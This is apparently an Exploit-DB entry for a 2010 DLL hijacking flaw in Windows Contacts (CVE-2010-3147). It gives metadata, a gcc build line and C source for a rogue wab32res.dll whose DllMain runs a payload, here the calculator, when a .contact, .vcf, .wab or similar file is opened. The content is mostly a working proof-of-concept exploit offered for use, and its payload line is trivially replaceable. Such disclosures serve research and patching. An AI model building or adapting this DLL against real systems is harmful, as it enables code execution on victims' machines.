Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking

Author: storm
type: local
platform: windows
port: 
date_added: 2010-08-25 
date_updated: 2010-08-25 
verified: 1 
codes: CVE-2010-3147;OSVDB-67553;CVE-2010-3143 
tags: 
aliases:  
screenshot_url:  
application_url: 

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}